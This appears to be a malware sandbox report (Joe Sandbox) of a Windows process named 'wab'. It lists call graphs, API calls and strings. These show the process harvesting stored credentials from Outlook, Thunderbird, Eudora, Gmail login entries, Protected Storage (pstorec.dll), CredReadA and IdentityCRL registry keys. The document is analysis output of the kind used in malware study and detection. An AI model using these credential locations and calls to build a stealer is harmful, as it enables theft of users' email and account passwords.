4030f9 RegCloseKey 33837->33839 33839->33830 33839->33831 33839->33834 33839->33835 33839->33837 33979 402db3 26 API calls 33839->33979 33841 4032d5 33840->33841 33842 4033a9 33840->33842 33980 4021b6 memset 33841->33980 33855 4034e4 memset memset 33842->33855 33844 4032e1 33981 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33844->33981 33846 4032ea 33847 4032f8 memset GetPrivateProfileSectionA 33846->33847 33982 4023e5 16 API calls 33846->33982 33847->33842 33852 40332f 33847->33852 33849 40339b strlen 33849->33842 33849->33852 33851 403350 strchr 33851->33852 33852->33842 33852->33849 33983 4021b6 memset 33852->33983 33984 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33852->33984 33985 4023e5 16 API calls 33852->33985 33856 410b1e 3 API calls 33855->33856 33857 40353f 33856->33857 33858 40357f 33857->33858 33859 403546 _mbscpy 33857->33859 33863 403985 33858->33863 33986 406d55 strlen _mbscat 33859->33986 33861 403565 _mbscat 33987 4033f0 19 API calls 33861->33987 33988 40466b _mbscpy 33863->33988 33867 4039aa 33869 4039ff 33867->33869 33989 40f460 memset memset 33867->33989 34010 40f6e2 33867->34010 34028 4038e8 21 API calls 33867->34028 33870 404785 FreeLibrary 33869->33870 33871 403a0b 33870->33871 33872 4037ca memset memset 33871->33872 34036 444551 memset 33872->34036 33875 4038e2 33875->33716 33938 40f334 334 API calls 33875->33938 33877 40382e 33878 406f06 2 API calls 33877->33878 33879 403843 33878->33879 33880 406f06 2 API calls 33879->33880 33881 403855 strchr 33880->33881 33882 403884 _mbscpy 33881->33882 33883 403897 strlen 33881->33883 33884 4038bf _mbscpy 33882->33884 33883->33884 33885 4038a4 sprintf 33883->33885 34048 4023e5 16 API calls 33884->34048 33885->33884 33888 44b090 33887->33888 33889 40fb10 RegOpenKeyExA 33888->33889 33890 403e7f 33889->33890 33891 40fb3b RegOpenKeyExA 33889->33891 33901 40f96c 33890->33901 33892 40fb55 RegQueryValueExA 33891->33892 33893 40fc2d RegCloseKey 33891->33893 33894 40fc23 RegCloseKey 33892->33894 33895 40fb84 33892->33895 33893->33890 33894->33893 33896 404734 3 API calls 33895->33896 33897 40fb91 33896->33897 33897->33894 33898 40fc19 LocalFree 33897->33898 33899 40fbdd memcpy memcpy 33897->33899 33898->33894 34053 40f802 11 API calls 33899->34053 33902 4070ae GetVersionExA 33901->33902 33903 40f98d 33902->33903 33904 4045db 7 API calls 33903->33904 33912 40f9a9 33904->33912 33905 40fae6 33906 404656 FreeLibrary 33905->33906 33907 403e85 33906->33907 33913 4442ea memset 33907->33913 33908 40fa13 memset WideCharToMultiByte 33909 40fa43 _strnicmp 33908->33909 33908->33912 33910 40fa5b WideCharToMultiByte 33909->33910 33909->33912 33911 40fa88 WideCharToMultiByte 33910->33911 33910->33912 33911->33912 33912->33905 33912->33908 33914 410dbb 9 API calls 33913->33914 33915 444329 33914->33915 34054 40759e strlen strlen 33915->34054 33920 410dbb 9 API calls 33921 444350 33920->33921 33922 40759e 3 API calls 33921->33922 33923 44435a 33922->33923 33924 444212 65 API calls 33923->33924 33925 444366 memset memset 33924->33925 33926 410b1e 3 API calls 33925->33926 33927 4443b9 ExpandEnvironmentStringsA strlen 33926->33927 33928 4443f4 _strcmpi 33927->33928 33929 4443e5 33927->33929 33930 403e91 33928->33930 33931 44440c 33928->33931 33929->33928 33930->33508 33932 444212 65 API calls 33931->33932 33932->33930 33933->33678 33934->33682 33935->33690 33936->33694 33937->33698 33938->33716 33939->33718 33940->33744 33941->33748 33942->33741 33944 40841c 33943->33944 33945 410a9c RegOpenKeyExA 33944->33945 33945->33757 33946->33763 33947->33763 33948->33767 33949->33769 33950->33763 33951->33772 33952->33778 33953->33778 33954->33781 33955->33778 33957 404656 FreeLibrary 33956->33957 33958 4045e3 LoadLibraryA 33957->33958 33959 404651 33958->33959 33960 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33958->33960 33959->33784 33959->33788 33961 40463d 33960->33961 33962 404643 33961->33962 33963 404656 FreeLibrary 33961->33963 33962->33959 33963->33959 33965 403cd2 33964->33965 33966 40465c FreeLibrary 33964->33966 33965->33797 33966->33965 33967->33794 33968->33801 33969->33806 33970->33810 33971->33811 33972->33806 33973->33806 33974->33806 33975->33826 33976->33839 33977->33839 33978->33839 33979->33839 33980->33844 33981->33846 33982->33847 33983->33851 33984->33852 33985->33852 33986->33861 33987->33858 33988->33867 34029 4078ba 33989->34029 33992 4078ba _mbsnbcat 33993 40f5a3 RegOpenKeyExA 33992->33993 33994 40f5c3 RegQueryValueExA 33993->33994 33995 40f6d9 33993->33995 33996 40f6d0 RegCloseKey 33994->33996 33997 40f5f0 33994->33997 33995->33867 33996->33995 33997->33996 33998 40f675 33997->33998 34033 40466b _mbscpy 33997->34033 33998->33996 34034 4012ee strlen 33998->34034 34000 40f611 34002 404734 3 API calls 34000->34002 34007 40f616 34002->34007 34003 40f69e RegQueryValueExA 34003->33996 34004 40f6c1 34003->34004 34004->33996 34005 40f66a 34006 404785 FreeLibrary 34005->34006 34006->33998 34007->34005 34008 40f661 LocalFree 34007->34008 34009 40f645 memcpy 34007->34009 34008->34005 34009->34008 34035 40466b _mbscpy 34010->34035 34012 40f6fa 34013 4045db 7 API calls 34012->34013 34014 40f708 34013->34014 34015 404734 3 API calls 34014->34015 34022 40f7e2 34014->34022 34017 40f715 34015->34017 34016 404656 FreeLibrary 34018 40f7f1 34016->34018 34019 40f71d CredReadA 34017->34019 34017->34022 34020 404785 FreeLibrary 34018->34020 34019->34022 34023 40f734 34019->34023 34021 40f7fc 34020->34021 34021->33867 34022->34016 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33867 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33992 34033->34000 34034->34003 34035->34012 34049 410a9c RegOpenKeyExA 34036->34049 34038 40381a 34038->33875 34047 4021b6 memset 34038->34047 34039 44458b 34039->34038 34050 410add RegQueryValueExA 34039->34050 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34038 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33877 34048->33875 34049->34039 34050->34041 34051->34044 34052->34046 34053->33898 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34099 444196 52 API calls 34062->34099 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34096 407f90 34066->34096 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34092 407e62 34070->34092 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33920 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34100 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34087 407f3f 34083->34087 34085 407f46 strlen strlen 34084->34085 34086 407f3a 34084->34086 34089 407f7f 34085->34089 34090 407f76 34085->34090 34088 407f90 FindClose 34086->34088 34087->34085 34087->34089 34088->34087 34089->34060 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34101 34093 407e6c strcmp 34092->34093 34095 407e94 34092->34095 34094 407e83 strcmp 34093->34094 34093->34095 34094->34095 34095->34070 34097 407fa3 34096->34097 34098 407f99 FindClose 34096->34098 34097->34071 34098->34097 34099->34060 34100->34080 34101->34089 34102->33522 34103->33526 34104->33533 34105->33532 34106->33539 34107->33536 34108->33531 34117 411853 RtlInitializeCriticalSection memset 34118 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34291 40a256 13 API calls 34293 432e5b 17 API calls 34295 43fa5a 20 API calls 34120 401060 41 API calls 34298 427260 CloseHandle memset memset 33196 410c68 FindResourceA 33197 410c81 SizeofResource 33196->33197 33199 410cae 33196->33199 33198 410c92 LoadResource 33197->33198 33197->33199 33198->33199 33200 410ca0 LockResource 33198->33200 33200->33199 34300 405e69 14 API calls 34125 433068 15 API calls __fprintf_l 34302 414a6d 18 API calls 34303 43fe6f 134 API calls 34127 424c6d 15 API calls __fprintf_l 34304 426741 19 API calls 34129 440c70 17 API calls 34130 443c71 44 API calls 34133 427c79 24 API calls 34307 416e7e memset __fprintf_l 34137 42800b 47 API calls 34138 425115 85 API calls __fprintf_l 34310 41960c 61 API calls 34139 43f40c 122 API calls __fprintf_l 34142 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34143 43f81a 20 API calls 34145 414c20 memset memset 34146 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34314 414625 18 API calls 34315 404225 modf 34316 403a26 strlen WriteFile 34318 40422a 12 API calls 34322 427632 memset memset memcpy 34323 40ca30 59 API calls 34324 404235 26 API calls 34147 42ec34 61 API calls __fprintf_l 34148 425115 76 API calls __fprintf_l 34325 425115 77 API calls __fprintf_l 34327 44223a 38 API calls 34154 43183c 112 API calls 34328 44b2c5 _onexit __dllonexit 34333 42a6d2 memcpy __allrem 34156 405cda 65 API calls 34341 43fedc 138 API calls 34342 4116e1 16 API calls __fprintf_l 34159 4244e6 19 API calls 34161 42e8e8 127 API calls __fprintf_l 34162 4118ee RtlLeaveCriticalSection 34347 43f6ec 22 API calls 34164 425115 119 API calls __fprintf_l 33186 410cf3 EnumResourceNamesA 34350 4492f0 memcpy memcpy 34352 43fafa 18 API calls 34354 4342f9 15 API calls __fprintf_l 34165 4144fd 19 API calls 34356 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34357 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34360 443a84 _mbscpy 34362 43f681 17 API calls 34168 404487 22 API calls 34364 415e8c 16 API calls __fprintf_l 34172 411893 RtlDeleteCriticalSection __fprintf_l 34173 41a492 42 API calls 34368 403e96 34 API calls 34369 410e98 memset SHGetPathFromIDList SendMessageA 34175 426741 109 API calls __fprintf_l 34176 4344a2 18 API calls 34177 4094a2 10 API calls 34372 4116a6 15 API calls __fprintf_l 34373 43f6a4 17 API calls 34374 440aa3 20 API calls 34376 427430 45 API calls 34180 4090b0 7 API calls 34181 4148b0 15 API calls 34183 4118b4 RtlEnterCriticalSection 34184 4014b7 CreateWindowExA 34185 40c8b8 19 API calls 34187 4118bf RtlTryEnterCriticalSection 34381 42434a 18 API calls __fprintf_l 34383 405f53 12 API calls 34195 43f956 59 API calls 34197 40955a 17 API calls 34198 428561 36 API calls 34199 409164 7 API calls 34387 404366 19 API calls 34391 40176c ExitProcess 34394 410777 42 API calls 34204 40dd7b 51 API calls 34205 425d7c 16 API calls __fprintf_l 34396 43f6f0 25 API calls 34397 42db01 22 API calls 34206 412905 15 API calls __fprintf_l 34398 403b04 54 API calls 34399 405f04 SetDlgItemTextA GetDlgItemTextA 34400 44b301 ??3@YAXPAX 34403 4120ea 14 API calls 3 library calls 34404 40bb0a 8 API calls 34406 413f11 strcmp 34210 434110 17 API calls __fprintf_l 34213 425115 108 API calls __fprintf_l 34407 444b11 _onexit 34215 425115 76 API calls __fprintf_l 34218 429d19 10 API calls 34410 444b1f __dllonexit 34411 409f20 _strcmpi 34220 42b927 31 API calls 34414 433f26 19 API calls __fprintf_l 34415 44b323 FreeLibrary 34416 427f25 46 API calls 34417 43ff2b 17 API calls 34418 43fb30 19 API calls 34227 414d36 16 API calls 34229 40ad38 7 API calls 34420 433b38 16 API calls __fprintf_l 34421 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34233 426741 21 API calls 34234 40c5c3 125 API calls 34236 43fdc5 17 API calls 34422 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34239 4161cb memcpy memcpy memcpy memcpy 33201 44b3cf 33202 44b3e6 33201->33202 33204 44b454 33201->33204 33202->33204 33208 44b40e 33202->33208 33205 44b405 33205->33204 33206 44b435 VirtualProtect 33205->33206 33206->33204 33207 44b444 VirtualProtect 33206->33207 33207->33204 33209 44b413 33208->33209 33211 44b454 33209->33211 33215 44b42b 33209->33215 33212 44b41c 33212->33211 33213 44b435 VirtualProtect 33212->33213 33213->33211 33214 44b444 VirtualProtect 33213->33214 33214->33211 33216 44b431 33215->33216 33217 44b435 VirtualProtect 33216->33217 33219 44b454 33216->33219 33218 44b444 VirtualProtect 33217->33218 33217->33219 33218->33219 34427 43ffc8 18 API calls 34240 4281cc 15 API calls __fprintf_l 34429 4383cc 110 API calls __fprintf_l 34241 4275d3 41 API calls 34430 4153d3 22 API calls __fprintf_l 34242 444dd7 _XcptFilter 34435 4013de 15 API calls 34437 425115 111 API calls __fprintf_l 34438 43f7db 18 API calls 34441 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34244 4335ee 16 API calls __fprintf_l 34443 429fef 11 API calls 34245 444deb _exit _c_exit 34444 40bbf0 138 API calls 34248 425115 79 API calls __fprintf_l 34448 437ffa 22 API calls 34252 4021ff 14 API calls 34253 43f5fc 149 API calls 34449 40e381 9 API calls 34255 405983 40 API calls 34256 42b186 27 API calls __fprintf_l 34257 427d86 76 API calls 34258 403585 20 API calls 34260 42e58e 18 API calls __fprintf_l 34263 425115 75 API calls __fprintf_l 34265 401592 8 API calls 33187 410b92 33190 410a6b 33187->33190 33189 410bb2 33191 410a77 33190->33191 33192 410a89 GetPrivateProfileIntA 33190->33192 33195 410983 memset _itoa WritePrivateProfileStringA 33191->33195 33192->33189 33194 410a84 33194->33189 33195->33194 34453 434395 16 API calls 34267 441d9c memcmp 34455 43f79b 119 API calls 34268 40c599 43 API calls 34456 426741 87 API calls 34272 4401a6 21 API calls 34274 426da6 memcpy memset memset memcpy 34275 4335a5 15 API calls 34277 4299ab memset memset memcpy memset memset 34278 40b1ab 8 API calls 34461 425115 76 API calls __fprintf_l 34465 4113b2 18 API calls 2 library calls 34469 40a3b8 memset sprintf SendMessageA 33220 410bbc 33223 4109cf 33220->33223 33224 4109dc 33223->33224 33225 410a23 memset GetPrivateProfileStringA 33224->33225 33226 4109ea memset 33224->33226 33231 407646 strlen 33225->33231 33236 4075cd sprintf memcpy 33226->33236 33229 410a0c WritePrivateProfileStringA 33230 410a65 33229->33230 33232 40765a 33231->33232 33234 40765c 33231->33234 33232->33230 33233 4076a3 33233->33230 33234->33233 33237 40737c strtoul 33234->33237 33236->33229 33237->33234 34280 40b5bf memset memset _mbsicmp

                      Executed Functions

                      Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                      APIs
                      • memset.MSVCRT ref: 0040832F
                      • memset.MSVCRT ref: 00408343
                      • memset.MSVCRT ref: 0040835F
                      • memset.MSVCRT ref: 00408376
                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • strlen.MSVCRT ref: 004083E9
                      • strlen.MSVCRT ref: 004083F8
                      • memcpy.MSVCRT ref: 0040840A
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                      • String ID: 5$H$O$b$i$}$}
                      • API String ID: 1832431107-3760989150
                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                      Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                      • strlen.MSVCRT ref: 00407F5C
                      • strlen.MSVCRT ref: 00407F64
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFindstrlen$FirstNext
                      • String ID: ACD
                      • API String ID: 379999529-620537770
                      • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                      • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                      Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 00401E8B
                      • strlen.MSVCRT ref: 00401EA4
                      • strlen.MSVCRT ref: 00401EB2
                      • strlen.MSVCRT ref: 00401EF8
                      • strlen.MSVCRT ref: 00401F06
                      • memset.MSVCRT ref: 00401FB1
                      • atoi.MSVCRT ref: 00401FE0
                      • memset.MSVCRT ref: 00402003
                      • sprintf.MSVCRT ref: 00402030
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • memset.MSVCRT ref: 00402086
                      • memset.MSVCRT ref: 0040209B
                      • strlen.MSVCRT ref: 004020A1
                      • strlen.MSVCRT ref: 004020AF
                      • strlen.MSVCRT ref: 004020E2
                      • strlen.MSVCRT ref: 004020F0
                      • memset.MSVCRT ref: 00402018
                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                      • _mbscpy.MSVCRT ref: 00402177
                      • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                      • API String ID: 1846531875-4223776976
                      • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                      • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                      Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                      • DeleteObject.GDI32(?), ref: 0040D1A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                      • API String ID: 745651260-375988210
                      • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                      • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                      Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                      • _mbscpy.MSVCRT ref: 00403E54
                      Strings
                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                      • pstorec.dll, xrefs: 00403C30
                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                      • PStoreCreateInstance, xrefs: 00403C44
                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc_mbscpy
                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                      • API String ID: 1197458902-317895162
                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                      Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 239 444c80-444c85 237->239 240 444c9f-444ca3 237->240 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 245 444cad-444cb0 241->245 243->234 244 444c95-444c9d 243->244 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 256 444d87-444d89 252->256 257 444d8b-444d9c GetStartupInfoA 252->257 253->250 254->251 254->255 255->252 258 444d7d-444d7e 255->258 256->257 256->258 259 444d9e-444da2 257->259 260 444daf-444db1 257->260 258->252 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                      • String ID: k{v
                      • API String ID: 3662548030-443568515
                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                      Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                      APIs
                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • memcpy.MSVCRT ref: 0040FBE4
                      • memcpy.MSVCRT ref: 0040FBF9
                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
